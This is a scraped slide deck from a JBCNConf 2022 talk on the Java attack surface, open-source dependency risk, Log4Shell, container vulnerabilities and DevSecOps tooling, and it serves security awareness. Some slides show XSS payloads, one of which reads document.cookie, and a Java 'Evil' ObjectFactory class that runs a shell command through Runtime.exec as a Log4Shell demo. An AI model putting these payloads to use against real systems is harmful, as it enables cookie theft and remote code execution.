Successfully reported this slideshow.
Your SlideShare is downloading. ×

Stranger Danger: Your Java Attack Surface Just Got Bigger | JBCNConf 2022

More Related Content

Related Books

Free with a 30 day trial from Scribd

See all

Stranger Danger: Your Java Attack Surface Just Got Bigger | JBCNConf 2022

  1. 1. Stranger Danger: Your Java Attack Surface Just Got Bigger Brian Vermeer | @BrianVerm JBCNConf 2022
  2. 2. @BrianVerm DevSecOps
  3. 3. @BrianVerm Brian Vermeer Sr. Developer Advocate DevSecCon co-leader NLJUG leader Virtual JUG leader Java Champion Foojay Community Manager Security
  4. 4. @BrianVerm What are the problems ? Lack of security focus throughout the app lifecycle Software delivery sped up with little thought to security Silo-ed security expertise Customer data could be compromised
  5. 5. @BrianVerm How bad is the Situation?
  6. 6. @BrianVerm The modern application A New Risk Profile ● 80-90% of codebase is Open Source ● 80% of vulnerabilities found in indirect dependencies ● 100s of Linux packages inherited from public sources ● Built, deployed & scaled in seconds ● #1 cloud vulnerability is misconfiguration [NSA] ● Network access, storage, servers - deployed 
 as fast as code ● 10-20% of code is custom - and digital transformation increases pressure to deliver more and faster. Code Open Source Containers Infrastructure as Code
  7. 7. @BrianVerm The modern application A New Risk Profile ● 80-90% of codebase is Open Source ● 80% of vulnerabilities found in indirect dependencies ● 100s of Linux packages inherited from public sources ● Built, deployed & scaled in seconds ● #1 cloud vulnerability is misconfiguration [NSA] ● Network access, storage, servers - deployed 
 as fast as code ● 10-20% of code is custom - and digital transformation increases pressure to deliver more and faster. Code Open Source Containers Infrastructure as Code
  8. 8. @BrianVerm The modern application A New Risk Profile ● 80-90% of codebase is Open Source ● 80% of vulnerabilities found in indirect dependencies ● 100s of Linux packages inherited from public sources ● Built, deployed & scaled in seconds ● #1 cloud vulnerability is misconfiguration [NSA] ● Network access, storage, servers - deployed 
 as fast as code ● 10-20% of code is custom - and digital transformation increases pressure to deliver more and faster. Code Open Source Containers Infrastructure as Code
  9. 9. @BrianVerm The modern application A New Risk Profile ● 80-90% of codebase is Open Source ● 80% of vulnerabilities found in indirect dependencies ● 100s of Linux packages inherited from public sources ● Built, deployed & scaled in seconds ● #1 cloud vulnerability is misconfiguration [NSA] ● Network access, storage, servers - deployed 
 as fast as code ● 10-20% of code is custom - and digital transformation increases pressure to deliver more and faster. Code Open Source Containers Infrastructure as Code /hello?user=<script>alert(1)</script>
  10. 10. @BrianVerm The modern application A New Risk Profile ● 80-90% of codebase is Open Source ● 80% of vulnerabilities found in indirect dependencies ● 100s of Linux packages inherited from public sources ● Built, deployed & scaled in seconds ● #1 cloud vulnerability is misconfiguration [NSA] ● Network access, storage, servers - deployed 
 as fast as code ● 10-20% of code is custom - and digital transformation increases pressure to deliver more and faster. Code Open Source Containers Infrastructure as Code <script>alert(1)</script> <b onmouseover=alert('Woof!')>click me!</b> <img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);> <IMG SRC=j&#X41vascript:alert('test2')>

  11. 11. @BrianVerm The modern application A New Risk Profile ● 80-90% of codebase is Open Source ● 80% of vulnerabilities found in indirect dependencies ● 100s of Linux packages inherited from public sources ● Built, deployed & scaled in seconds ● #1 cloud vulnerability is misconfiguration [NSA] ● Network access, storage, servers - deployed 
 as fast as code ● 10-20% of code is custom - and digital transformation increases pressure to deliver more and faster. Code Open Source Containers Infrastructure as Code
  12. 12. cost so far 140M until discovered 76d 2.0B US consumers affected
  13. 13. @BrianVerm Your app
  14. 14. @BrianVerm Your app Your 
 code
  15. 15. 222 Lines of Code 5 Direct dependencies 54 dependencies (incl. indirect) 460,046 Lines of Code Spring Serverless Example
  16. 16. @BrianVerm Open Source Usage 
 Has Exploded
  17. 17. @BrianVerm Attackers Are 
 Targeting Open Source One Vulnerability, many victims
  18. 18. @BrianVerm New Packages Created by ecosystem per year
  19. 19. @BrianVerm Vulnerabilities identified in ecosystems
  20. 20. @BrianVerm Vulnerabilities in direct versus indirect dependencies
  21. 21. of projects have Log4j as transitive dependency 17K attempted attacks in 72h 800K 57% Java packages impacted
  22. 22. @BrianVerm Log4J
 JNDI & LDAP

  23. 23. @BrianVerm soo public class Evil implements ObjectFactory { @Override public Object getObjectInstance (Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception { String[] cmd = { "/bin/sh", "-c", "open -a Calculator" }; Runtime.getRuntime().exec(cmd); return null; } }
  24. 24. @BrianVerm https://snyk.io/blog/log4j-rce-log4shell-vulnerability- cve-2021-44228/
  25. 25. @BrianVerm OS maintainers are confident in their own security knowledge
  26. 26. @BrianVerm
  27. 27. @BrianVerm Who should be responsible for security?
  28. 28. @BrianVerm Who should be responsible for security?
  29. 29. @BrianVerm The modern application A New Risk Profile ● 80-90% of codebase is Open Source ● 80% of vulnerabilities found in indirect dependencies ● 100s of Linux packages inherited from public sources ● Built, deployed & scaled in seconds ● #1 cloud vulnerability is misconfiguration [NSA] ● Network access, storage, servers - deployed 
 as fast as code ● 10-20% of code is custom - and digital transformation increases pressure to deliver more and faster. Code Open Source Containers Infrastructure as Code
  30. 30. @BrianVerm Vulnerabilities per Docker image
  31. 31. @BrianVerm When do you scan your Docker image for OS vulns?
  32. 32. @BrianVerm How do you find out about new vulns in your deployed containers?
  33. 33. @BrianVerm Let’s HACK!
  34. 34. @BrianVerm The modern application A New Risk Profile ● 80-90% of codebase is Open Source ● 80% of vulnerabilities found in indirect dependencies ● 100s of Linux packages inherited from public sources ● Built, deployed & scaled in seconds ● #1 cloud vulnerability is misconfiguration [NSA] ● Network access, storage, servers - deployed 
 as fast as code ● 10-20% of code is custom - and digital transformation increases pressure to deliver more and faster. Code Open Source Containers Infrastructure as Code
  35. 35. @BrianVerm What is the Solution? What do people care about and how should they collaborate Culture The best way to adopt a new practice is to integrate into existing processes Process Pick the tooling that fits your process
 Automate away manual steps Tooling
  36. 36. @BrianVerm Snyk Code
  37. 37. @BrianVerm Snyk Open Source
  38. 38. @BrianVerm Snyk Container
  39. 39. @BrianVerm Snyk Infrastructure as Code
  40. 40. @BrianVerm CI/CD Git repository Traditional/PaaS Serverless Production DevSecOps: Continuous Security, Integrated throughout DevOps Registry deploy Code Test & fix Test, fix, monitor Kubernetes Monitor & more... build submit Test, fix, monitor
  41. 41. @BrianVerm “Shift left” is not enough Empowering developers to build applications securely within the entire development process Empower developers Enable security teams
  42. 42. @BrianVerm Thank you Develop fast. Stay secure.

×